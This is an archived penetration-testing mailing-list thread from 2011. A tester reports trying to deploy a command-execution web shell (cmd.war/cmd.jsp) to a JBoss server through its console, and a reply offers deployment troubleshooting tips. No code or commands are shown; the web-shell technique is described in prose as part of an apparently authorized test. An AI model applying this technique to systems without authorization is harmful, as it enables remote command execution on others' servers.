Penetration Testing mailing list archives

RE: breaking jboss with a browser? not happening

From: lazers <a.alii85 () gmail com>
Date: Fri, 21 Jan 2011 00:14:54 -0800 (PST)

Yes i tried the same method once again the only different thing i do was to
change my
web-server from my machine running apache httpd server to WAMPSERVER.This
change did
something miraculous for me .coz using that web-server i was able to upload
the cmd.war
onto the server. I verified this by viewing the file under the
jboss.management.local
section of the console.

However, this change all by sudden went away when my files were auto deleted
from the server. Before that i can access the file cmd.jsp but it was not
accessible as by code. Meaning i was
getting gibberish like the whole output of the cmd.jsp was displayed in a
mix of text/acsii/and symbolic representation meaning i was not getting the
form page as it should according to the code.

But even then it was a big sign of relief since i was able to access the
file ; the only thing bothersome
with the whole game was perhaps the representation of the file.

So i'm back to point blank 0 now.:(

i don't want to do the metasploit still cause i want to grab the lowest
hanging fruit first
something which require least knowledge and effort. And even if i skip this
to metasploit
i have to document everything and provide a convincing explanation to my
manager for this change-over
As per now i don't really why this behavior is so erratic and random.

Please comment . THANKS

----------------

Hembrow, Chris wrote:

I've never tried deploying a WAR this way, and I've not used JBoss in a
few=  years, but I'll try a few suggestions.  In the JBoss console, can
you see = a list of the deployed web apps somewhere?  This might let you
see when/if = yours is deployed.

JBoss includes embedded Tomcat which handles the actual HTTP elements.
Cre= ating the WAR is just packaging for deployment, JSPs are compiled on
the fl= y.  If there was an issue with your code you should get a 500
error, not 40= 4.

Try deploying without the <servlet> block in the web.xml file; this
shouldn= 't be necessary for a JSP page.  Also, try including a regular
HTML page (i= .e. not JSP) in the WAR and accessing that.  This will rule
out a compilati= on issue.=20

HTH

Chris

(Sorry for top posting, but Outlook sucks)